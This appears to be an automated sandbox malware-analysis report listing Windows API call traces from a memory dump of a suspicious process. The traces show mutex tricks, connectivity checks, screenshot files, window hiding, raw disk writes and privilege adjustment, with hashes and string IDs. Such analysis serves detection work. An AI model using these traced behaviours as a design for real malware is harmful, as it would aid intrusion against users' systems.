                                                                                                                                                                                                                • Part of subcall function 012EDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 012EDAC3
                                                                                                                                                                                                                • Part of subcall function 012EDA20: CreateMutexA.KERNEL32(00000000,00000000,0132F670), ref: 012EDAE1
                                                                                                                                                                                                                • Part of subcall function 012EDA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 012EDAFF
                                                                                                                                                                                                                • Part of subcall function 012EDA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 012EDB20
                                                                                                                                                                                                                • Part of subcall function 012EDA20: SetNamedSecurityInfoA.ADVAPI32(0132F670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012EDB3D
                                                                                                                                                                                                                • Part of subcall function 012EDA20: LocalFree.KERNEL32(00000000), ref: 012EDB47
                                                                                                                                                                                                                • Part of subcall function 012EDC50: memset.MSVCRT(?,00000000,00000090,00000000,?), ref: 012EDC69
                                                                                                                                                                                                                • Part of subcall function 012EDC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 012EDC82
                                                                                                                                                                                                                • Part of subcall function 01309F50: malloc.MSVCRT(00000350,00000000,?,?,?,012E837F,?,?,?,?,?,012E8212,00000000,00000000), ref: 01309F62
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 012E83E7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 012E83F5
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(00000000,fuck), ref: 012E83FF
                                                                                                                                                                                                                • Part of subcall function 012F4F80: IsNetworkAlive.SENSAPI(012E6E0D,00000000), ref: 012F4F93
                                                                                                                                                                                                                • Part of subcall function 012F4F80: #680.SHELL32 ref: 012F4FA1
                                                                                                                                                                                                                • Part of subcall function 012F4F80: DnsFlushResolverCache.DNSAPI ref: 012F4FAB
                                                                                                                                                                                                                • Part of subcall function 012F4F80: memset.MSVCRT(?,00000000,00000103,00000000,774D0F10), ref: 012F4FC8
                                                                                                                                                                                                                • Part of subcall function 012F4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,774D0F10), ref: 012F4FE7
                                                                                                                                                                                                                • Part of subcall function 012F4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 012F5000
                                                                                                                                                                                                                • Part of subcall function 012F4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5013
                                                                                                                                                                                                                • Part of subcall function 012F4F80: memset.MSVCRT(?,00000000,00000103,?,00000000,774D0F10), ref: 012F502C
                                                                                                                                                                                                                • Part of subcall function 012F4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,774D0F10), ref: 012F5045
                                                                                                                                                                                                                • Part of subcall function 012F4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 012F5058
                                                                                                                                                                                                                • Part of subcall function 012F4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 012F5065
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 012E84A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 012E84B1
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 012E84E0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012E84EF
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012E84FD
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 012E8506
                                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,00000000), ref: 012E854C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$#680AliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickVersionlstrcpymalloc
                                                                                                                                                                                                              • String ID: P0Mw$SYSTEM!841618!025F9049$fuck
                                                                                                                                                                                                              • API String ID: 2944798476-1586808242
                                                                                                                                                                                                              • Opcode ID: 50bbf5894df70c59dd7eecdfd29f5bd0f09cc5060971e47c9175f982044caf0e
                                                                                                                                                                                                              • Instruction ID: 1507e76a496138aa98fc85c639164e1954287c834b62a54893fc59fd077486af
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50bbf5894df70c59dd7eecdfd29f5bd0f09cc5060971e47c9175f982044caf0e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A451C2B51143029FE734AF68E84CFA63BECFB44325F55457DE6988B299CB71A404CB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 013030A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013030E9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013030F5
                                                                                                                                                                                                              • #680.SHELL32 ref: 013030F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130310A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303111
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303142
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303148
                                                                                                                                                                                                              • #680.SHELL32 ref: 0130314C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130315D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303164
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 01303192
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 013031A8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61C5C435$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-1097404317
                                                                                                                                                                                                              • Opcode ID: 981c7cc244a79e82bac70d3e91950bcf373eaea4d53ab6583a91b110ab8b5ac7
                                                                                                                                                                                                              • Instruction ID: f4481e5df977f53def5614da3f432d336798a781a0d66cc4f41e2caf025a45a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 981c7cc244a79e82bac70d3e91950bcf373eaea4d53ab6583a91b110ab8b5ac7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E313A315042185FDB31EF789C68BEABBFCBF59705F444098E985D3244DAB0D984CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C387), ref: 01301347
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01301389
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01301395
                                                                                                                                                                                                              • #680.SHELL32 ref: 01301399
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013013AA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013013B1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013013E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013013E8
                                                                                                                                                                                                              • #680.SHELL32 ref: 013013EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013013FD
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01301404
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 01301432
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 01301448
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61C5C387$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-73659253
                                                                                                                                                                                                              • Opcode ID: 526959363c14f1df15f19371368c145c8c4d04e80b3ff1257db396e81aac423a
                                                                                                                                                                                                              • Instruction ID: 1aa7c248bd992f7def68d478ebba873cb9d9193795eabee66d7f40defcfb1961
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 526959363c14f1df15f19371368c145c8c4d04e80b3ff1257db396e81aac423a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B73169315003285BDB32EF789C68BEABBECBF55704F444098EA85D3244DEB0D984CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c487), ref: 013023B7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013023F9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01302405
                                                                                                                                                                                                              • #680.SHELL32 ref: 01302409
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130241A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01302421
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01302452
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01302458
                                                                                                                                                                                                              • #680.SHELL32 ref: 0130245C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130246D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01302474
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 013024A2
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 013024B8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61c5c487$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-181139224
                                                                                                                                                                                                              • Opcode ID: ec41db23d5c35cba1b0948c4c20befa3ddd977d05860d0c92ecb87aff832df0d
                                                                                                                                                                                                              • Instruction ID: 3dfd201a9423ca77d49ceb82596837c2f515f074ab59245419c11d83fdd503dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec41db23d5c35cba1b0948c4c20befa3ddd977d05860d0c92ecb87aff832df0d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E03126315042195BCB31AF789C6CBEBBBFCBF55704F554098EA84D3244DAB0D984CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3), ref: 012FEDFA
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FEE3C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FEE48
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FEE4C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FEE5D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FEE64
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FEE93
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FEE99
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FEE9D
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FEEAE
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FEEB5
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 012FEEEA
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 012FEF00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61c5c1a3$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-1878464270
                                                                                                                                                                                                              • Opcode ID: 98cfc1e96da37aa31d381c573136270e0cbf6033182a98680c9f3f9319810d98
                                                                                                                                                                                                              • Instruction ID: 9dc14d8f4fcbebfc287878fd31a376e91899fcd0db5af027775f1be83ce183f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98cfc1e96da37aa31d381c573136270e0cbf6033182a98680c9f3f9319810d98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D531F8715002295BDB31AF78AC58BEABBECBF55710F4640ACEB85D3145DA70DA44CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C165), ref: 01300447
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01300489
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01300495
                                                                                                                                                                                                              • #680.SHELL32 ref: 01300499
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013004AA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013004B1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013004E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013004E8
                                                                                                                                                                                                              • #680.SHELL32 ref: 013004EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013004FD
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01300504
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 01300532
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 01300548
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61C5C165$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-1538338398
                                                                                                                                                                                                              • Opcode ID: 7b311867b511185e4ddf346cbf81fe34ae78c1272a13c69c668398474a43c556
                                                                                                                                                                                                              • Instruction ID: adcbbf8486a5ed8ddc367e54ffa75b21aaa90ce11a81a3e9be5f4fd8ba604c1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b311867b511185e4ddf346cbf81fe34ae78c1272a13c69c668398474a43c556
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF3138315042285BCB31EF789C68BEABBECBF55744F454098F984E3245DEB0DA84CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012EC53D
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012EC540
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EC545
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EC554
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 012EC567
                                                                                                                                                                                                              • GetClassNameA.USER32(00000000,?,00000101), ref: 012EC589
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 012EC5F5
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EC,?), ref: 012EC617
                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 012EC626
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 012EC62F
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 012EC642
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 012EC64A
                                                                                                                                                                                                              • EnumChildWindows.USER32(00000000,Function_0000C4B0,00000000), ref: 012EC658
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012EC661
                                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 012EC66F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassLong$SleepVisible$AttributesChildEnumInfoLayeredNameProcessThreadWindows
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 3510281082-4251816714
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,0000040C), ref: 012F3550
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 012F3598
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 012F35AE
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32(00000002), ref: 012F35B6
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 012F35BD
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(0133DDB4,?,00000005), ref: 012F35DF
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0133DDB4), ref: 012F35E6
                                                                                                                                                                                                                • Part of subcall function 012F33F0: memset.MSVCRT(?,00000000,00000103), ref: 012F3411
                                                                                                                                                                                                                • Part of subcall function 012F33F0: GetDriveTypeA.KERNEL32 ref: 012F3428
                                                                                                                                                                                                                • Part of subcall function 012F33F0: SetCurrentDirectoryA.KERNEL32 ref: 012F3438
                                                                                                                                                                                                                • Part of subcall function 012F33F0: _snprintf.MSVCRT(00000000,00000104,\\.\PhysicalDrive%u,?), ref: 012F3465
                                                                                                                                                                                                                • Part of subcall function 012F33F0: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 012F3487
                                                                                                                                                                                                                • Part of subcall function 012F33F0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F34B1
                                                                                                                                                                                                                • Part of subcall function 012F33F0: LockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 012F34C0
                                                                                                                                                                                                                • Part of subcall function 012F33F0: WriteFile.KERNEL32(00000000,00000000,00000104,00000000,00000000), ref: 012F34D9
                                                                                                                                                                                                                • Part of subcall function 012F33F0: UnlockFile.KERNEL32(00000000,00000000,00000000,00000104,00000000), ref: 012F34EA
                                                                                                                                                                                                                • Part of subcall function 012F33F0: GetHandleInformation.KERNEL32(00000000,?), ref: 012F3507
                                                                                                                                                                                                                • Part of subcall function 012F33F0: CloseHandle.KERNEL32(00000000), ref: 012F3518
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(0133DDB4,?,00000005), ref: 012F362F
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(0133DDB4), ref: 012F3636
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Drive$Type$CurrentHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLockLogicalModePointerPriorityStringsUnlockWrite_snprintf
                                                                                                                                                                                                              • String ID: AppEvents$Console$Control Panel$Environment$Identities$Software$System
                                                                                                                                                                                                              • API String ID: 1338089429-328203234
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012E857E
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 012E8586
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000104,Global\HighMemoryEvent_%08x,00000000), ref: 012E859E
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 012E85B2
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012E85D2
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 012E85F3
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012E8612
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012E861C
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000002), ref: 012E8624
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(winmm.dll,waveOutOpen), ref: 012E8634
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 012E863B
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(000000FF,00000000,?,00000006,00000000), ref: 012E865D
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessSecurity$CurrentDescriptorToken$ErrorOpenThread$AddressAdjustCloseConvertCreateFreeHandleInfoLastLibraryLoadLocalLookupMemoryModeMutexNamedPrivilegePrivilegesProcSaclStringValueWrite_snprintfmemset
                                                                                                                                                                                                              • String ID: Global\HighMemoryEvent_%08x$S:(ML;;NRNWNX;;;LW)$waveOutOpen$winmm.dll
                                                                                                                                                                                                              • API String ID: 848744509-1707559921
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 013031EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013031FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01303211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00023080,00000000,00000000,00000000), ref: 01303234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 01303245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0130324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0130325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01303277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C435,RFK), ref: 01303291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0130329A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
